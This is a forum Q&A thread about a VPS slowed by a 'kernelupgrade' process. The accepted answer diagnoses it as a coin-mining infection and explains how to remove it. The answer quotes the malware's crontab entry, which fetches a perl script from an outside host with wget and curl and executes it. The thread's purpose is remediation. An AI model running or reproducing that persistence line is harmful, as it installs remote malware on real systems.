# Kernelupgrade high CPU usage in Centos 2.6

Tags: linux, load, centos

My VPS is getting a high load by a process called "kernelupgrade" in centos. When I kill this process by hand, it starts again a few minutes later.

I did run "yum update" and made all the packages up to date. A reboot did run too, but it didn't help unfortunately.
Today I did a rootkit check with "rkhunter" with no suspicious results.

I'm running Centos 2.6.32-431.5.1.e16.x86_64.

Thanks!

Answer (score 2, accepted):

This is a bitcoin/altcoin mining virus!! If you check your crontabs you will probably find a couple of entries that download updated versions of the virus and starts it, something like this:

## */30 * * * * cd /tmp;wget http://updates.dyndnss-web.com/.../xyz.txt;curl -O http://updates.dyndnss-web.com/.../xyz.txt;perl xyz.txt;rm -f xyz.txt

To delete the virus just delete the crontab entries and kill kernelupgrade

Don't forget to change all your passwords to secure ones, it looks like they gained entry by brute force on insecure password.

Comment: I've just seen this on a network-facing Ubuntu box.  Do you have a link where we can find more info on this virus?